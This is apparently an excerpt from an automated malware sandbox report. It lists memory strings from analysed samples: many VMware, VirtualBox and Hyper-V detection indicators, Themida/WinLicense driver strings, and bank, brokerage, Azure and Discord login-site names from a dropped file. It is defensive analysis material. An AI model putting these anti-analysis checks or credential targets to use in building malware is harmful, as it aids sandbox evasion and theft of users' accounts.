                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
                        Source: cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: vmware
                        Source: AAFBAKEC.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
                        Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: "Windows 8 Microsoft Hyper-V Server
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
                        Source: AFHDAKJKFC.exe, AFHDAKJKFC.exe, 00000008.00000002.2394575853.00000000007BB000.00000040.00000001.01000000.00000009.sdmp, explortu.exe, explortu.exe, 0000000A.00000002.2412835457.000000000064B000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
                        Source: AAFBAKEC.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V
                        Source: AAFBAKEC.0.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
                        Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
                        Source: AAFBAKEC.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Standard without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Hyper-V (guest)
                        Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: AAFBAKEC.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                        Source: AAFBAKEC.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Microsoft Hyper-V Server
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
                        Source: cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Vindows 2012 Microsoft Hyper-V Server
                        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000008EC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.0000000000A8C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: ~VirtualMachineTypes
                        Source: AAFBAKEC.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000008EC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.0000000000A8C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                        Source: AAFBAKEC.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Microsoft Hyper-V Server
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000008EC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.0000000000A8C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                        Source: AAFBAKEC.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
                        Source: AAFBAKEC.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Standard without Hyper-V
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: )Windows 8 Server Standard without Hyper-V
                        Source: AFHDAKJKFC.exe, 00000008.00000002.2394575853.00000000007BB000.00000040.00000001.01000000.00000009.sdmp, explortu.exe, 0000000A.00000002.2412835457.000000000064B000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
                        Source: AAFBAKEC.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
                        Source: AAFBAKEC.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: %Windows 2012 Microsoft Hyper-V Server
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Hyper-V
                        Source: Amcache.hve.6.drBinary or memory string: VMware
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: $Windows 8.1 Microsoft Hyper-V Server
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: ,Windows 2012 Server Standard without Hyper-V
                        Source: AAFBAKEC.0.drBinary or memory string: discord.comVMware20,11696487552f
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Microsoft Hyper-V Server
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: AAFBAKEC.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Essential Server Solutions without Hyper-V
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Essential Server Solutions without Hyper-V
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001739000.00000004.00000020.00020000.00000000.sdmp, cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001C0E000.00000004.00000020.00020000.00000000.sdmp, cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: AAFBAKEC.0.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
                        Source: AAFBAKEC.0.drBinary or memory string: tasks.office.comVMware20,11696487552o
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
                        Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
                        Source: AAFBAKEC.0.drBinary or memory string: AMC password management pageVMware20,11696487552
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: %Windows 2016 Microsoft Hyper-V Server
                        Source: AAFBAKEC.0.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                        Source: AAFBAKEC.0.drBinary or memory string: dev.azure.comVMware20,11696487552j
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
                        Source: AAFBAKEC.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
                        Source: AAFBAKEC.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: +Windows 8.1 Server Standard without Hyper-V
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V
                        Source: AAFBAKEC.0.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: AAFBAKEC.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
                        Source: AAFBAKEC.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
